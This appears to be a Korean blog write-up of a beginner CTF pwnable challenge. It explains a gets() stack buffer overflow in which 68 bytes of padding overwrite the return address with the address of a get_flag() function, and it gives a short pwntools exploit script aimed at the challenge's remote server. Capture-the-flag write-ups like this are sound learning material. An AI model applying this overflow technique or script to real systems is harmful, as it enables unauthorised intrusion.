ii4gsp
N00bCTF - very ezzzzzz!! 본문
파일을 다운받아 주자.
파일을 IDA로 열어보면 이전 문제와 똑같다 gets()함수에서 취약점이 발생한다.
s는 0x40만큼 할당되었다.
0x40은 64이다.
s ~ sfp까지는 68이다.
s ~ sfp 68byte를 덮어주고 ret를 get_flag()함수로 조작해주면 쉘을 획득할 수 있다.
get_flag()함수의 주소는 0x08048556이다.
Exploit
from pwn import *
r = remote('52.79.224.215', 30006)
payload = ''
payload += '\x90' * 68
payload += p32(0x08048556)
r.sendline(payload)
r.interactive()
'시스템 해킹 > N00bCTF - Pwnable' 카테고리의 다른 글
N00bCTF - Over the RET (0) | 2020.02.10 |
---|---|
N00bCTF - What is bof? (0) | 2020.02.10 |
Comments